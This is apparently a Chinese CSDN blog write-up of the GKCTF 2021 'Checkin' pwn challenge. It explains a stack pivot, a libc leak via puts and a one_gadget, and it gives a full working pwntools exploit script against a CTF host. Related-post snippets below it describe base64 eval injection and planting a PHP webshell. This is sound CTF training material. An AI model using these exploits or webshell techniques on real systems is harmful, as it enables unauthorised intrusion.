[GKCTF 2021]Checkin

最新推荐文章于 2024-06-24 10:57:59 发布
最新推荐文章于 2024-06-24 10:57:59 发布
阅读量894 收藏 5
点赞数 35
文章标签: 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/137629539
版权

以此记载比较复杂的栈迁移。

s1和buf都以‘admin\x00'开头就可以了,buf最多只能覆盖rbp,此函数执行完之后就是

leave,retn ;一眼栈迁移。

s1能写一些exp,一眼迁移到s1。

首先肯定要泄露基址,但是s1第一个0x8是'admin\x00\x00\x00',所以可用的实际只有0x18。

pop_rdi+puts_got就占用了0x10,所以后面必须找一个能调用puts并重新写入payload的地址。

继续在ida中查找:

这个0x4018B5就刚刚好,能直接执行puts,再重新执行一遍读入的函数。

所以第一段payload就是:

pop=0x0000000000401ab3
puts=elf.got['puts']
back=0x4018B5
payload=b'admin'.ljust(0x8,b'\x00')+p64(pop)+p64(puts)+p64(back)

这样就成功泄露libc基址了。

现在,我们需要想一下back中执行read时,rsp,rbp等的空间情况。

以下是简略的图。

第二次读入输入'admin\x00\x00\x00'*3+one_gadget+(buf)就可以了。

system应该也能构造,但栈可能要再迁移一轮,就是用one_gadget算了。

以下是全部代码:

from pwn import *
context.arch='amd64'
io=remote('node4.anna.nssctf.cn',28371)
io.recvuntil(b'>')
elf=ELF('./login')
libc=ELF('./libc.so.6')
pop=0x0000000000401ab3
puts=elf.got['puts']
back=0x4018B5
payload=b'admin'.ljust(0x8,b'\x00')+p64(pop)+p64(puts)+p64(back)
io.send(payload)
io.recvuntil(b'>')
bss=0x602400
payload=b'admin'.ljust(0x20,b'\x00')+p64(bss)
io.send(payload)
puts=u64(io.recvuntil(b'\x7f')[-6:].ljust(0x8,b'\x00'))
libc_base=puts-libc.sym['puts']
io.recvuntil(b'>')
payload=b'admin'.ljust(0x8,b'\x00')
io.sendline(payload)
io.recvuntil(b'>')
one_gadget=0x4527a+libc_base
payload=b'admin'.ljust(0x8,b'\x00')+b'admin'.ljust(0x8,b'\x00')+b'admin'.ljust(0x8,b'\x00')+p64(one_gadget)+p64(bss)
io.send(payload)
io.interactive()

此题我本来使用的是之前一题的libc.so.6,一直打不通,后来用了题目提供的才成功。

原来libc.so.6之间也会有差别,以后做题尽量使用题目提供的libc。

奇怪的轩轩
关注
  • 35
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
glados_checkin
03-25
glados定时签到
GKCTF2021 checkin
pondzhang的专栏
06-27 497
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
GKCTF2021_checkin
z1r0的博客
04-09 410
GKCTF2021_checkin 查看保护 简单题 有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li =
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1360
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
GKCTF2020 checkin
qq_53755216的博客
06-23 308
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
[GKCTF2020]CheckIN
末初的CSDN博客
06-17 1043
题目复现地址 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo'];
GKCTF2020 CheckIN Writeup
Tajang的大千世界
04-11 235
打开实例是一段PHP代码。 通过代码没有发现反序列化函数,但是可以通过Ginkgo传参,但必须要传经过base64编码后的。上传phpinfo();试试,顺便看看php版本,将**phpinfo();**经base64编码后上传。 payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 如下图 上传个一句话木马试试,将**eval($_POST[a]);**经base64编码
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4295
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1795
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
[GKCTF2020]CheckIN -wp
freerats的博客
06-06 1198
向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。 发现没有问题,发现一大堆被禁的函数,php版本为7.3。 接下来看看能不能穿一句话上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然后用蚁剑连接 可以看到flag和readflag; 权限不够无法打开flag,readflag打开也是一堆乱码。 这种情况一般就是通过执行readflag来获取flag。 接下来就要结合7.3版本,r
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
SHA256 安全散列算法加速器实验
weixin_64593595的博客
06-22 1134
SHA256 加速器是用来计算 SHA-256 的计算单元,SHA256 是 SHA-2 下细分出的一种算法。 SHA-2 名称来自于安全散列算法 2(英语:Secure Hash Algorithm 2)的缩写,一种密码散列函 数算法标准,由美国国家安全局研发,由美国国家标准与技术研究院(NIST)在 2001 年发布。 属于 SHA 算法之一,是 SHA-1 的后继者。其下又可再分为六个不同的算法标准,包括了: SHA-224、SHA-256、SHA-384、SHA-512、SHA-512/224、SH
开源网安参与编制的《代码大模型安全风险防范能力要求及评估方法》正式发布
最新发布
weixin_55163056的博客
06-24 222
​代码大模型在代码生成、代码翻译、代码补全、错误定位与修复、自动化测试等方面为研发人员带来了极大便利的同时,也带来了对安全风险防范能力的挑战。基于此,中国信通院依托中国人工智能产业发展联盟(AIIA),联合开源网安和百度、蚂蚁集团、阿里云等业内近30家单位共同编制了《代码大模型安全风险防范能力要求及评估方法》规范(以下简称“规范”),经多次完善和修订,于近日正式定稿发布。
c++中串口的安全封装使用
jjjxxxhhh123的博客
06-21 323
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 325
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全
vmlogin888的博客
06-18 615
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值